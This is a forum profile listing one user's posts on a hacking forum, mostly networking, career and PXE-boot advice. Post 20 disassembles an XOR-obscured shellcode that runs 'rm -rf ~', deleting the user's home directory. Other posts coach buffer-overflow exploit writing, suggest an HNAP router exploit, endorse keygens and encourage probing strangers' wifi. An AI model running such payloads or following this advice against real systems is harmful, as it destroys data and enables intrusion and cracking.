int0x80

Active Members
Posts: 160
Days Won: 3

Everything posted by int0x80

  1. If your goal is to find your path out to the uplink, you can just use traceroute, or " " as some next gen hax0rs say.Is the AP kicking you over to the 10.10.10.x net after you 'authenticate'? I would pull an IP, nmap the subnet before authenticating. Then authenticate, check your IP address, and nmap the new subnet if your IP has changed. Then do a battle roll, shop da whops, and under 9000.
  2. dat_google.jpg http://synshop.org/wiki/ https://twitter.com/#!/syn_shop
  3. Make keygens, who cares. For local auth schemes, all the code is right there. There may be some protection/obfuscation/compression/encryption to protect the key algorithm, but the fact is you have all the code. So the whole key (lol) is to understand the algorithm and re-implement it in your keygen. This is typically done by using common reverse engineering tools; most often a debugger and disassembler. Everyone has their own preferences, though IDA tends to be the du jour disassembler. Anyways, with local auth schemes, you have the lock and the key -- this is why DRM is such a fail; defective by design.
  4. It's alright. From a technical standpoint, there are many contradictions. They make the IT guys out to be nerds, but then they are dumb as hell. However, the actors do have some shining moments in playing the roles quite well. Bonuses for EFF and MC Frontalot paraphernalia. Additional bonus for being a BBC show and having more than 11 episodes: Achievement Unlocked.
  5. As an alternative, have you considered teaching a free home computer security class at your local library or hackerspace? We offer classes at Hive13 all the time. There are a number of benefits to this approach:

     1. You help people (though you might be saying "bfd").
     2. You have a conversation piece for job interviews and college applications that shows you do something useful with your time outside of school. Employers and colleges eat that stuff up.
     3. People will know you as a helpful person and will call you to help them fix their computers/networks, for which you charge them.

     I strongly recommend creating an official business (I have an LLC) before any money starts changing hands. It's easy and inexpensive to set up, and can limit your liability and losses in the event that something goes horribly awry.
  6. Prepare for bad reactions. This reminds me of a story with some kids from my city. I may be off on the details as it was a while back. IIRC, these kids won the WiFi Shootout at Defcon; then went around town finding APs with insecure configurations. They would then go ring the doorbell and offer consulting services to secure the network. People freaked out and the kids got no business; and I believe they were threatened with legal action on more than one occasion. It seems people will probably consider this as a personal attack, even though it's not intended that way. Here is the 2004 Wired article about them winning the WiFi Shootout -- http://www.wired.com/culture/lifestyle/news/2004/08/64440
  7. Do internet stuff from a VM snapshot and always revert.
  8. So glad our country is burning cycles to solve real problems.
  9. Can you bridge the NICs in your gateway box and insert it inline between the AP and modem? I did this with the first firewalls I built; one was OpenBSD with pf, the other was Linux with grsec/PaX/ebtables/iptables. This is fine for locking your front door, but what happens if Aurora Borealis breaks out in your kitchen?
  10. Education

     Lots of different aspects here, but I will mention this: Some job descriptions list that a particular degree is required. If your resume doesn't list that degree, HR throws out your resume, regardless of whether you're qualified. Take a look at job postings you consider interesting and note the education requirements. I have a BS in Computer Science, and it has served me fine.
  11. You're out of luck if other people use the same proxies for the same service and get the proxy IP addresses b&. The IP addresses you posted are different, so perhaps other people have beaten you to the punch.
  12. One time, I accidentally the whole database. Also yes, some routers do ship with dd-wrt :)
  13. Set a watch on priGroup. In the code from your post, the only place that member gets modified is in Square::setGroupArray, so also consider placing a breakpoint on that method and see how/where it gets called. HTH :)
  14. Randomize the MAC address on your wifi interface, go to other apartment complexes and places with wifi, and start seeing what you can find.
  15. Github and Google Code are two popular venues for hosting FOSS projects. As for licensing, there are a variety of FOSS licenses that include attribution, take your pick :]
  16. Run BT5 live via DVD-R and remove the HDD before con. There are other places to store code, but you've removed the most common platforms for persistence mechanisms thereby eliminating most of the threat.
  17. I recently added Backtrack to my PXE setup at home. Assuming you already have a working PXE setup with NFS, my tftp root is at /store/tftpboot.

     0. Create Backtrack PXE directories:

        mkdir -p /store/tftpboot/backtrack/5/R1/x{86,64}/{kde,gnome}

     1. Mount iso and copy contents to PXE Backtrack directory:

        sudo mount -o loop,ro -t iso9660 BT5R1-KDE-32.iso /mnt
        cp -av /mnt/* /store/tftpboot/backtrack/5/R1/x86/kde/
        sudo umount /mnt

        Repeat as needed for other permutations.

     2. Add exports to NFS:

        # /etc/exports
        /store/tftpboot/backtrack/5/R1/x64/kde 192.168.1.0/24(ro,sync,no_subtree_check)
        /store/tftpboot/backtrack/5/R1/x86/kde 192.168.1.0/24(ro,sync,no_subtree_check)

        Repeat as needed for other permutations.

     3. Create a backtrack.menu file for PXE:

        LABEL 21
        MENU LABEL Backtrack 5 R1 x86 KDE
        KERNEL /backtrack/5/R1/x86/kde/casper/vmlinuz
        APPEND initrd=/backtrack/5/R1/x86/kde/casper/initrd.gz boot=casper text vga=789 netboot=nfs nfsroot=your.LAN.IP.addr:/store/tftpboot/backtrack/5/R1/x86/kde
        TEXT HELP
        Boot the Backtrack 5 R1 x86 KDE Live CD
        ENDTEXT

        LABEL 22
        MENU LABEL Backtrack 5 R1 x64 KDE
        KERNEL /backtrack/5/R1/x64/kde/casper/vmlinuz
        APPEND initrd=/backtrack/5/R1/x64/kde/casper/initrd.gz boot=casper text vga=789 netboot=nfs nfsroot=your.LAN.IP.addr:/store/tftpboot/backtrack/5/R1/x64/kde
        TEXT HELP
        Boot the Backtrack 5 R1 x64 KDE Live CD
        ENDTEXT

        Repeat as needed for other permutations.

     4. Add the Backtrack menu into your pxelinux.cfg/default:

        MENU BEGIN Backtrack
        MENU TITLE Backtrack
        LABEL Previous
        MENU LABEL Previous Menu
        TEXT HELP
        Return to previous menu
        ENDTEXT
        MENU EXIT
        MENU SEPARATOR
        MENU INCLUDE backtrack/backtrack.menu
        MENU END

     Restart your nfs and tftp daemons and you should be good to go. SJ every day.
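The "repeat as needed for other permutations" steps above can be generated instead of typed; this is an added example script, not part of the original post, that emits the /etc/exports lines and the backtrack.menu entries for every arch/desktop pair. It assumes the post's tftp root (/store/tftpboot), LAN subnet (192.168.1.0/24), a placeholder server address, and label numbers counting up from 21.

```shell
#!/bin/sh
# Added example (not from the original post): generate NFS export lines and
# pxelinux menu entries for the Backtrack 5 R1 x86/x64 x kde/gnome permutations.
TFTP_ROOT=/store/tftpboot          # assumed, as in the post
NFS_SERVER=your.LAN.IP.addr        # placeholder, as in the post
LAN_SUBNET=192.168.1.0/24          # assumed, as in the post

# One /etc/exports line for arch $1 and desktop $2.
export_line() {
    printf '%s/backtrack/5/R1/%s/%s %s(ro,sync,no_subtree_check)\n' \
        "$TFTP_ROOT" "$1" "$2" "$LAN_SUBNET"
}

# One pxelinux menu entry: label number $1, arch $2, desktop $3.
menu_entry() {
    dir="/backtrack/5/R1/$2/$3"
    de_upper=$(printf '%s' "$3" | tr a-z A-Z)
    printf 'LABEL %s\n' "$1"
    printf 'MENU LABEL Backtrack 5 R1 %s %s\n' "$2" "$de_upper"
    printf 'KERNEL %s/casper/vmlinuz\n' "$dir"
    printf 'APPEND initrd=%s/casper/initrd.gz boot=casper text vga=789 netboot=nfs nfsroot=%s:%s%s\n' \
        "$dir" "$NFS_SERVER" "$TFTP_ROOT" "$dir"
    printf 'TEXT HELP\nBoot the Backtrack 5 R1 %s %s Live CD\nENDTEXT\n\n' "$2" "$de_upper"
}

# All export lines, in the same order the menu uses.
generate_exports() {
    for arch in x86 x64; do
        for de in kde gnome; do
            export_line "$arch" "$de"
        done
    done
}

# All menu entries; label numbers start at 21 and increase by one per entry.
generate_menu() {
    label=21
    for arch in x86 x64; do
        for de in kde gnome; do
            menu_entry "$label" "$arch" "$de"
            label=$((label + 1))
        done
    done
}

# Usage: generate_exports >> /etc/exports
#        generate_menu > /store/tftpboot/backtrack/backtrack.menu
```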
  18. Give the HNAP exploit a try at least, unless your firmware is 1.33NA or newer (fixed 01/28/2010). Here is a list of strings in the .bin that's compressed in the firmware image: http://slexy.org/view/s2iTxmDC7j Sometimes routers have backdoor admin accounts; you may get lucky looking through the strings.
  19. Executables are more complex than just the byte code instructions. When you load and execute a binary, it is already running in memory. So why would you need to "convert it to shellcode" to run it in memory?
  20. This is not smc so it is pretty easy:

        $ echo -en "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80" | ndisasm -u -
        00000000  B8FF2F7368        mov eax,0x68732fff
        00000005  C1E808            shr eax,0x8
        00000008  50                push eax
        00000009  B82F62696E        mov eax,0x6e69622f
        0000000E  50                push eax
        0000000F  89E3              mov ebx,esp
        00000011  31C0              xor eax,eax
        00000013  50                push eax
        00000014  66B87171          mov ax,0x7171
        00000018  66355151          xor ax,0x5151
        0000001C  6650              push ax
        0000001E  B82337712F        mov eax,0x2f713723
        00000023  3551515151        xor eax,0x51515151
        00000028  50                push eax
        00000029  B8233C717C        mov eax,0x7c713c23
        0000002E  3551515151        xor eax,0x51515151
        00000033  50                push eax
        00000034  89E1              mov ecx,esp
        00000036  31C0              xor eax,eax
        00000038  50                push eax
        00000039  66B82D63          mov ax,0x632d
        0000003D  6650              push ax
        0000003F  89E2              mov edx,esp
        00000041  31C0              xor eax,eax
        00000043  B064              mov al,0x64
        00000045  29C4              sub esp,eax
        00000047  31C0              xor eax,eax
        00000049  50                push eax
        0000004A  51                push ecx
        0000004B  52                push edx
        0000004C  53                push ebx
        0000004D  89E1              mov ecx,esp
        0000004F  31D2              xor edx,edx
        00000051  31C0              xor eax,eax
        00000053  B00B              mov al,0xb
        00000055  CD80              int 0x80
        00000057  B401              mov ah,0x1
        00000059  31DB              xor ebx,ebx
        0000005B  CD80              int 0x80

     Let me know if you need more help.
  21. Welcome! Sorry for a short reply, I have over 9000 reasons why it's not awesome but hopefully it can get you over a hurdle.

     1. How does the JMP ESP address from a non-ASLR dll help us execute shellcode?
        If your payload is at the top of the stack (esp), then a jmp esp will direct execution to your payload.

     2. Why do we need to pack the EIP address in little endian format?
        In x86, all data types bigger than a word are expressed in little endian.

     3. How do we know how many NOPs to use in our sled?
        Use pattern_create.rb and pattern_offset.rb to find total size, subtract out payload and anything else you need to overwrite (addresses, etc). Just arithmetic.

     4. What is the proper method for overwriting SEH and hiding our shellcode somewhere else?
        Check out both parts of section 3 of the Corelan win32 exploit series:
        https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
        https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

     Sorry I don't have time to go more into detail, but you seem like a self-starter so I think you'll be alright :] Best of luck, and I wish you shells a-plenty.